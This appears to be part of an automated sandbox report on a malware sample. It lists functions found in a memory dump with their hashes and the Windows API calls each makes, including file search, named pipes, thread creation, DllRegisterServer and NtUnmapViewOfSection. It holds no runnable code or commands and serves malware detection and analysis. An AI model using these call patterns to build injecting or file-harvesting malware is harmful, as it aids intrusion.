  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
